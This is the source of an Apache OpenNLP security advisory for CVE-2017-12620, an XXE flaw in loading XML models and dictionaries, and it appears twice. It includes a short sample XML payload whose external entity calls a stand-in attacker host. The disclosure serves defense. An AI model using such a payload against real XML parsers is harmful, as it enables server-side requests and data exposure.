src/main/jbake/content/news/cve-2017-12620.ad - opennlp-site - Git at Google

 ////
    Licensed to the Apache Software Foundation (ASF) under one
    or more contributor license agreements.  See the NOTICE file
    distributed with this work for additional information
    regarding copyright ownership.  The ASF licenses this file
    to you under the Apache License, Version 2.0 (the
    "License"); you may not use this file except in compliance
    with the License.  You may obtain a copy of the License at

      http://www.apache.org/licenses/LICENSE-2.0

    Unless required by applicable law or agreed to in writing,
    software distributed under the License is distributed on an
    "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
    KIND, either express or implied.  See the License for the
    specific language governing permissions and limitations
    under the License.
 ////
 = CVE-2017-12620 - Apache OpenNLP XXE vulnerability
 Apache OpenNLP
 2017-10-02
 :jbake-type: post
 :jbake-tags: community
 :jbake-status: published
 :category: news
 :idprefix:

 Severity: Medium

 Vendor:
 The Apache Software Foundation

 Versions Affected:

 * OpenNLP 1.5.0 to 1.5.3
 * OpenNLP 1.6.0
 * OpenNLP 1.7.0 to 1.7.2
 * OpenNLP 1.8.0 to 1.8.1

 Description:
 When loading models or dictionaries that contain XML it is possible to
 perform an XXE attack, since OpenNLP is a library, this only affects
 applications that load models or dictionaries from untrusted sources.

 Mitigation:
 All users who load models or XML dictionaries from untrusted sources
 should update to 1.8.2.


 Example:

 An attacker can place this:
 [source,xml,indent=0,subs=attributes+]
 ----
 <?xml version="1.0" ?>
 <!DOCTYPE r [
 <!ELEMENT r ANY >
 <!ENTITY sp SYSTEM "http://evil.attacker.com/">
 ]>
 <r>&sp;</r>
 ----

 Inside one of the XML files, either a dictionary or embedded inside a
 model package, to demonstrate this vulnerability.

 Credit:
 This issue was discovered by Nishil Shah of Salesforce.

 --The Apache OpenNLP Team
	////
	Licensed to the Apache Software Foundation (ASF) under one
	or more contributor license agreements. See the NOTICE file
	distributed with this work for additional information
	regarding copyright ownership. The ASF licenses this file
	to you under the Apache License, Version 2.0 (the
	"License"); you may not use this file except in compliance
	with the License. You may obtain a copy of the License at

	http://www.apache.org/licenses/LICENSE-2.0

	Unless required by applicable law or agreed to in writing,
	software distributed under the License is distributed on an
	"AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
	KIND, either express or implied. See the License for the
	specific language governing permissions and limitations
	under the License.
	////
	= CVE-2017-12620 - Apache OpenNLP XXE vulnerability
	Apache OpenNLP
	2017-10-02
	:jbake-type: post
	:jbake-tags: community
	:jbake-status: published
	:category: news
	:idprefix:

	Severity: Medium

	Vendor:
	The Apache Software Foundation

	Versions Affected:

	* OpenNLP 1.5.0 to 1.5.3
	* OpenNLP 1.6.0
	* OpenNLP 1.7.0 to 1.7.2
	* OpenNLP 1.8.0 to 1.8.1

	Description:
	When loading models or dictionaries that contain XML it is possible to
	perform an XXE attack, since OpenNLP is a library, this only affects
	applications that load models or dictionaries from untrusted sources.

	Mitigation:
	All users who load models or XML dictionaries from untrusted sources
	should update to 1.8.2.


	Example:

	An attacker can place this:
	[source,xml,indent=0,subs=attributes+]
	----
	<?xml version="1.0" ?>
	<!DOCTYPE r [
	<!ELEMENT r ANY >
	<!ENTITY sp SYSTEM "http://evil.attacker.com/">
	]>
	<r>&sp;</r>
	----

	Inside one of the XML files, either a dictionary or embedded inside a
	model package, to demonstrate this vulnerability.

	Credit:
	This issue was discovered by Nishil Shah of Salesforce.

	--The Apache OpenNLP Team